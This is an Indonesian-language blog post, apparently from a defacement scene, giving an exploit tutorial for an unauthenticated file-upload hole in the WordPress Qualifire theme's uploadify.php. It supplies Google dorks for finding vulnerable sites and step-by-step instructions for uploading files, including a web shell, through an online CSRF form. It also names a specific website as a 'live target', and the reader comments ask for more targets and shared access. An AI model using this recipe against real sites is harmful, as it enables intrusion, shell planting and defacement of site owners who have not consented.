[+] Exploit Title = WordPress Themes Qualifire CSRF File Upload
[+] Google Dork =
- inurl:/wp-content/themes/qualifire
- index of / wp-content/themes/qualifire
[+] Exploit = site.com/[path]/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php
[+] Tutorial
1. Dorking dulu menggunakan dork yang telah saya sediakan di atas pada search engine kesukaan kalian.
2. Jika sudah menemukan target, tambahkan exploit seperti di atas di belakang URL website. Vulnerability? Tampilan website blank!
3. Masuk ke CSRF Online banyak kok di google, tinggal kalian cari sendiri h3h3 :'v
4. Isi kolom pertama dengan target website yang vuln, isi kolom kedua dengan postfile "Filedata" lalu kunci target tersebut.
5. Upload file kalian yang ber - extensi txt, jpg, png, gif kalau lagi hoki bisa upload shell :'3
6. Akses filenya gimana gan? http://site.com/[path]/filekalian.txt atau http://site.com/filekalian.txt
Live Target = http://www.hintofsaffron.com/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php
Nah, gimana gan, so easy kan? :v Jika kalian ingin request tutor tinggal comment aja di kolom komentar. There a problem? Google Your Friend!
){kind=link}
Kasih live target lagi lah
BalasHapusUsaha sendiri lah
masa disua
melulu _-
HapusSekali kali give away akses, biar visitor makin banyak
Hapus;v
Wp theme qualifier ama u-design beda ya gan?
BalasHapusBeda gan
Hapus